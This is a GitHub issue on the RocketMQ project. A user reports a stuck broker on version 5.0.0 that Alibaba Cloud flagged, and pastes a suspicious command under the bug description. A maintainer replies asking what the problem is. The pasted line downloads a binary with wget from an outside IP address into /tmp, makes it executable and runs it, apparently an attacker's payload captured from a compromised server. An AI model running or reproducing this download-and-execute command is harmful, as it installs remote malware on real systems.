Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Bug] Service stuck, Alibaba Cloud detected a bug, #8735

Open
3 tasks done
KongZouXiang opened this issue Sep 24, 2024 · 1 comment
Open
3 tasks done

[Bug] Service stuck, Alibaba Cloud detected a bug, #8735

KongZouXiang opened this issue Sep 24, 2024 · 1 comment

Comments

@KongZouXiang
Copy link

Before Creating the Bug Report

  • I found a bug, not just asking a question, which should be created in GitHub Discussions.

  • I have searched the GitHub Issues and GitHub Discussions of this repository and believe that this is not a duplicate.

  • I have confirmed that this bug belongs to the current repository, not other repositories of RocketMQ.

Runtime platform environment

Ubuntu22.04

RocketMQ version

5.0.0

JDK Version

JDK11

Describe the Bug

sh -c $@|sh . echo cd /tmp; wget -O /tmp/ls http://95.214.27.9:8237/base/ls1; chmod 777 /tmp/ls; /tmp/ls china;/bin/startfsrv.sh -c ../conf/broker.conf -n 127.0.0.1:9876

Steps to Reproduce

-[897306] /bin/sh ./mqbroker -c ../conf/broker.conf
-[897310] sh /opt/rocketmq-all-5.0.0-bin-release/bin/runbroker.sh org.apache.rocketmq.broker.BrokerStartup -c ../conf/broker.conf
-[897334] /opt/jdk-11.0.21/bin/java -server -Xms256m -Xmx256m -Xmn128m -XX:+UseG1GC -XX:G1HeapRegionSize=16m -XX:G1ReservePercent=25 -XX:InitiatingHeapOccupancyPercent=30 -XX:SoftRefLRUPolicyMSPerMB=0 -XX:+UseG1GC -XX:G1HeapRegionSize=16m -XX:G1ReservePercent=25 -XX:InitiatingHeapOccupancyPercent=30 -XX:SoftRefLRUPolicyMSPerMB=0 -Xlog:gc*:file=/dev/shm/rmq_srv_gc_%p_%t.log:time,tags:filecount=5,filesize=30M -XX:-OmitStackTraceInFastThrow -XX:+AlwaysPreTouch -XX:MaxDirectMemorySize=15g -XX:-UseLargePages -XX:-UseBiasedLocking -Drocketmq.client.logUseSlf4j=true -cp .:/opt/rocketmq-all-5.0.0-bin-release/bin/../conf:/opt/rocketmq-all-5.0.0-bin-release/bin/../lib/*: org.apache.rocketmq.broker.BrokerStartup -c ../conf/broker.conf

What Did You Expect to See?

reason

What Did You See Instead?

no

Additional Context

No response

@leizhiyuan
Copy link
Contributor

What is your problem?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants